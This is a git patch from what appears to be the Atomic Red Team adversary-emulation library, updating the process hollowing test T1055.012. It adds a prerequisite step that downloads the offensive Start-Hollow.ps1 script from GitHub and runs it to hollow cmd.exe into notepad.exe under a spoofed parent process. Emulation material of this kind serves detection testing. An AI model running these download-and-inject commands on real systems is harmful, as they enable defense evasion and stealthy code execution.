From 3aaf3364aaf4b05a417c6e89d211b61158bd01ab Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 17 Jul 2025 22:30:09 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 54 +++++++++++++++++++++++++++--- atomics/Indexes/windows-index.yaml | 54 +++++++++++++++++++++++++++--- atomics/T1055.012/T1055.012.md | 21 +++++++++++- 3 files changed, 120 insertions(+), 9 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a7ea389f..6f82fb61 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -23819,6 +23819,14 @@ defense-evasion: supported_platforms: - windows input_arguments: + script_download_url: + description: Download url for Start-Hollow.ps1 + type: string + default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1 + script_path: + description: Path to Start-Hollow.ps1 + type: path + default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) @@ -23838,7 +23846,7 @@ defense-evasion: default: notepad executor: command: | - . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1" + . "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction @@ -23846,6 +23854,21 @@ defense-evasion: ' name: powershell + dependency_executor_name: powershell + dependencies: + - description: 'Start-Hollow.ps1 must be installed + + ' + prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + try { + iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force) + } catch { + Write-Error $_ + Exit 1 + } - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process @@ -23931,7 +23954,7 @@ defense-evasion: -program "#{hollow_binary_path}" -debug ' - cleanup_command: |- + cleanup_command: | Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue T1564.009: @@ -46361,6 +46384,14 @@ privilege-escalation: supported_platforms: - windows input_arguments: + script_download_url: + description: Download url for Start-Hollow.ps1 + type: string + default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1 + script_path: + description: Path to Start-Hollow.ps1 + type: path + default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) @@ -46380,7 +46411,7 @@ privilege-escalation: default: notepad executor: command: | - . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1" + . "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction @@ -46388,6 +46419,21 @@ privilege-escalation: ' name: powershell + dependency_executor_name: powershell + dependencies: + - description: 'Start-Hollow.ps1 must be installed + + ' + prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + try { + iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force) + } catch { + Write-Error $_ + Exit 1 + } - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process @@ -46473,7 +46519,7 @@ privilege-escalation: -program "#{hollow_binary_path}" -debug ' - cleanup_command: |- + cleanup_command: | Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue T1068: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index cf067701..461b1696 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -19697,6 +19697,14 @@ defense-evasion: supported_platforms: - windows input_arguments: + script_download_url: + description: Download url for Start-Hollow.ps1 + type: string + default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1 + script_path: + description: Path to Start-Hollow.ps1 + type: path + default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) @@ -19716,7 +19724,7 @@ defense-evasion: default: notepad executor: command: | - . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1" + . "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction @@ -19724,6 +19732,21 @@ defense-evasion: ' name: powershell + dependency_executor_name: powershell + dependencies: + - description: 'Start-Hollow.ps1 must be installed + + ' + prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + try { + iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force) + } catch { + Write-Error $_ + Exit 1 + } - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process @@ -19809,7 +19832,7 @@ defense-evasion: -program "#{hollow_binary_path}" -debug ' - cleanup_command: |- + cleanup_command: | Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue T1564.009: @@ -38413,6 +38436,14 @@ privilege-escalation: supported_platforms: - windows input_arguments: + script_download_url: + description: Download url for Start-Hollow.ps1 + type: string + default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1 + script_path: + description: Path to Start-Hollow.ps1 + type: path + default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) @@ -38432,7 +38463,7 @@ privilege-escalation: default: notepad executor: command: | - . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1" + . "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction @@ -38440,6 +38471,21 @@ privilege-escalation: ' name: powershell + dependency_executor_name: powershell + dependencies: + - description: 'Start-Hollow.ps1 must be installed + + ' + prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + try { + iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force) + } catch { + Write-Error $_ + Exit 1 + } - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process @@ -38525,7 +38571,7 @@ privilege-escalation: -program "#{hollow_binary_path}" -debug ' - cleanup_command: |- + cleanup_command: | Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue T1068: diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index 545c4806..27b76d36 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -39,6 +39,8 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| +| script_download_url | Download url for Start-Hollow.ps1 | string | https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1| +| script_path | Path to Start-Hollow.ps1 | path | PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1| | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe| | parent_process_name | Name of the parent process | string | explorer| | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:\Windows\System32\notepad.exe| @@ -49,7 +51,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ ```powershell -. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1" +. "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose ``` @@ -61,6 +63,23 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore +#### Dependencies: Run with `powershell`! +##### Description: Start-Hollow.ps1 must be installed +##### Check Prereq Commands: +```powershell +if (Test-Path "#{script_path}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +try { + iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force) +} catch { + Write-Error $_ + Exit 1 +} +``` + +